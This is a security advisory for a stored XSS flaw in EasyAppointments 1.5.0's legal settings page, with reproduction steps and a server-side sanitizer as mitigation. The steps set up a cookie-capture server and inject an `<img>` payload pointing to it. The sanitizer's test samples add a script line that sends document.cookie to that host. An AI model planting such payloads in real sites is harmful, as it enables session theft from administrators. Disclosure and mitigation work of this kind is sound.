EasyAppointments 1.5.0 | Authenticated Stored XSS on Legal Settings Page
Basic Information
Software Type | Web App
---|---
Software Name | EasyAppointments
Affected Version | 1.5.0
Software Vendor | Alex Tselegidis
Software Link | https://github.com/alextselegidis/easyappointments
Severity | Medium
CVSS Score | 6.6
CVE Link | https://www.cve.org/CVERecord?id=CVE-2024-57601
Affected Assets | 3000+
Date of Discovery | Dec 22nd, 2024
Description
The `/index.php/legal_settings` endpoint has three fields where an administrator can insert custom policies, such as a cookie policy. The problem is that whatever HTML is stored in these fields is rendered, and any embedded code executed, every time the legal settings page itself loads. Most editors only render embedded code on the page where the content is displayed, not in the form where it is being edited; either way, this opens the site to a stored XSS attack against anyone who views the page.
Reproduce
1. To set up a cookie-stealer server, save the following PHP script as `capture.php`:
   https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
2. Start a PHP server to serve it:
   ```shell
   $ php -S 0.0.0.0:1718
   ```
3. Log in to the admin panel.
4. Go to `/index.php/legal_settings`.
5. Inside the Cookies field, click the embed code option of the text editor.
6. Insert the following:
   ```html
   <img src="http://127.0.0.1:1718/capture.php">
   ```
7. This will capture cookies every time an administrator visits the legal settings page.

Note that the plain `<img>` payload leaks the session cookie in this local setup because browsers scope cookies by host, not by port: a request to `127.0.0.1:1718` carries the cookies the application set for `127.0.0.1`. The injection point itself accepts arbitrary HTML through the embed option, so the trigger is not limited to this particular payload.
Proof of Concept (PoC) Video
PoC Exploit
N/A
Mitigation
Sanitize the three legal-settings fields on the server with an allowlist of HTML tags and attributes (dropping `<script>`, `<iframe>`, `on*` event handlers and `javascript:` URLs) before they are stored, and render the stored, sanitized value rather than the raw editor input. Restrictions in the browser-side editor alone are not a control, since the save request can be sent without the editor.
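As an illustration of that allowlist approach, the following sanitizer was written for this page; it is not EasyAppointments code, and the tag, attribute and URL-scheme lists are assumptions chosen for policy text. It parses the editor's HTML with `DOMDocument`, removes script-bearing elements together with their content, unwraps every other unknown tag (so the `<img>` payload from the PoC disappears entirely), and keeps only `href` and `title` on links whose scheme is http, https or mailto:

```php
<?php
// Added example for this advisory, not EasyAppointments code: allowlist
// sanitizer for the legal-settings fields, to be applied server-side before
// the value is stored. The allowlists below are assumptions for policy text.
declare(strict_types=1);

const ALLOWED_TAGS = ['p', 'br', 'strong', 'em', 'u', 'ul', 'ol', 'li',
                      'h1', 'h2', 'h3', 'h4', 'blockquote', 'a'];
// Attributes allowed per tag; anything else (style, on*, src, ...) is dropped.
const ALLOWED_ATTRS = ['a' => ['href', 'title']];
const ALLOWED_URL_SCHEMES = ['http', 'https', 'mailto'];
// Elements whose text content must go as well, not just the tag.
const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math'];

function sanitizePolicyHtml(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate editor output that is not well-formed
    $doc->loadHTML('<!DOCTYPE html><html><head>'
        . '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
        . '</head><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    sanitizeChildren($body);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function sanitizeChildren(DOMNode $parent): void
{
    // Snapshot the child list: nodes are removed and moved while walking it.
    foreach (iterator_to_array($parent->childNodes) as $child) {
        if ($child instanceof DOMText) {
            continue; // text is safe; the serializer escapes it
        }
        if (!($child instanceof DOMElement)) {
            $parent->removeChild($child); // comments, CDATA, processing instructions
            continue;
        }
        $tag = strtolower($child->tagName);
        if (in_array($tag, DROP_WITH_CONTENT, true)) {
            $parent->removeChild($child);
            continue;
        }
        // Clean the subtree first so that children hoisted out of an
        // unwrapped element have already been sanitized.
        sanitizeChildren($child);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            // Unknown element (div, span, img, ...): keep its text, drop the tag.
            while ($child->firstChild !== null) {
                $parent->insertBefore($child->firstChild, $child);
            }
            $parent->removeChild($child);
            continue;
        }
        sanitizeAttributes($child, $tag);
    }
}

function sanitizeAttributes(DOMElement $el, string $tag): void
{
    $allowed = ALLOWED_ATTRS[$tag] ?? [];
    $names = [];
    foreach ($el->attributes as $attr) {
        $names[] = $attr->name;
    }
    foreach ($names as $name) {
        $lower = strtolower($name);
        if (!in_array($lower, $allowed, true)) {
            $el->removeAttribute($name);
        } elseif ($lower === 'href' && !isSafeUrl($el->getAttribute($name))) {
            $el->removeAttribute($name); // javascript:, data:, vbscript: ...
        }
    }
}

function isSafeUrl(string $url): bool
{
    // Browsers ignore ASCII control characters inside a scheme ("java\tscript:"),
    // so strip them before inspecting it.
    $probe = preg_replace('/[\x00-\x20\x7f]+/', '', $url) ?? '';
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $probe, $m)) {
        return true; // relative URL, no scheme at all
    }
    return in_array(strtolower($m[1]), ALLOWED_URL_SCHEMES, true);
}

// Constructed inputs: the advisory's PoC payload plus two common variants.
$samples = [
    '<p>We use cookies.</p><img src="http://127.0.0.1:1718/capture.php">',
    '<p onmouseover="alert(1)" style="color:red">Policy</p><a href="javascript:alert(1)">link</a>',
    '<script>new Image().src="http://127.0.0.1:1718/?c="+document.cookie</script><em>ok</em>',
];
foreach ($samples as $sample) {
    echo sanitizePolicyHtml($sample), "\n";
}
```

Applied when the legal settings are saved, this makes the rendered page independent of whatever the browser-side editor happens to permit. A strict Content-Security-Policy on the admin pages adds a second layer, but it is not a substitute for cleaning the stored value.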
Patch
Not available. The maintainer states that the issue is well known and that no fix will be issued at the moment.
Posted on: January 11, 2025 12:06 AM